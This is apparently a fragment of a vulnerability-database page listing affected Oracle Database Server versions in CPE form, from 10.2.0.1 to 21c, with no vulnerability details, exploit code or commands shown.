- Oracle>>Database_server >> Version 10.2.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.3 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.3 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.4 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.4.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.5 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.1 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.3 (Open CPE detail)
- Oracle>>Database_server >> Version 11 (Open CPE detail)
- Oracle>>Database_server >> Version 11.1.0.6 (Open CPE detail)
- Oracle>>Database_server >> Version 11.1.0.6.0 (Open CPE detail)
- Oracle>>Database_server >> Version 11.1.0.6.0 (Open CPE detail)
- Oracle>>Database_server >> Version 11.1.0.7 (Open CPE detail)
- Oracle>>Database_server >> Version 11.1.0.7.0 (Open CPE detail)
- Oracle>>Database_server >> Version 11.1.0.7.0 (Open CPE detail)
- Oracle>>Database_server >> Version 11.2.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 11.2.0.1.0 (Open CPE detail)
- Oracle>>Database_server >> Version 11.2.0.1.0 (Open CPE detail)
- Oracle>>Database_server >> Version 11.2.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 11.2.0.3 (Open CPE detail)
- Oracle>>Database_server >> Version 11.2.0.4 (Open CPE detail)
- Oracle>>Database_server >> Version 11g (Open CPE detail)
- Oracle>>Database_server >> Version 12.1.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 12.1.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 12.2.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 12c (Open CPE detail)
- Oracle>>Database_server >> Version 18 (Open CPE detail)
- Oracle>>Database_server >> Version 18.1 (Open CPE detail)
- Oracle>>Database_server >> Version 18.1.0.0 (Open CPE detail)
- Oracle>>Database_server >> Version 18.2 (Open CPE detail)
- Oracle>>Database_server >> Version 18c (Open CPE detail)
- Oracle>>Database_server >> Version 19.1 (Open CPE detail)
- Oracle>>Database_server >> Version 19.3 (Open CPE detail)
- Oracle>>Database_server >> Version 19.3 (Open CPE detail)
- Oracle>>Database_server >> Version 19.4 (Open CPE detail)
- Oracle>>Database_server >> Version 19.5 (Open CPE detail)
- Oracle>>Database_server >> Version 19.6 (Open CPE detail)
- Oracle>>Database_server >> Version 19.7 (Open CPE detail)
- Oracle>>Database_server >> Version 19.8 (Open CPE detail)
- Oracle>>Database_server >> Version 19.9 (Open CPE detail)
- Oracle>>Database_server >> Version 19.10 (Open CPE detail)
- Oracle>>Database_server >> Version 19.11 (Open CPE detail)
- Oracle>>Database_server >> Version 19.12 (Open CPE detail)
- Oracle>>Database_server >> Version 19.13 (Open CPE detail)
- Oracle>>Database_server >> Version 19.14 (Open CPE detail)
- Oracle>>Database_server >> Version 19.15 (Open CPE detail)
- Oracle>>Database_server >> Version 19.16 (Open CPE detail)
- Oracle>>Database_server >> Version 19.17 (Open CPE detail)
- Oracle>>Database_server >> Version 19.18 (Open CPE detail)
- Oracle>>Database_server >> Version 19.19 (Open CPE detail)
- Oracle>>Database_server >> Version 19.20 (Open CPE detail)
- Oracle>>Database_server >> Version 19.20 (Open CPE detail)
- Oracle>>Database_server >> Version 19.21 (Open CPE detail)
- Oracle>>Database_server >> Version 19.22 (Open CPE detail)
- Oracle>>Database_server >> Version 19.23 (Open CPE detail)
- Oracle>>Database_server >> Version 19c (Open CPE detail)
- Oracle>>Database_server >> Version 21.3 (Open CPE detail)
- Oracle>>Database_server >> Version 21.3 (Open CPE detail)
- Oracle>>Database_server >> Version 21.11 (Open CPE detail)
- Oracle>>Database_server >> Version 21.12 (Open CPE detail)
- Oracle>>Database_server >> Version 21.13 (Open CPE detail)
- Oracle>>Database_server >> Version 21c (Open CPE detail)
References
2025©
tesweb SA
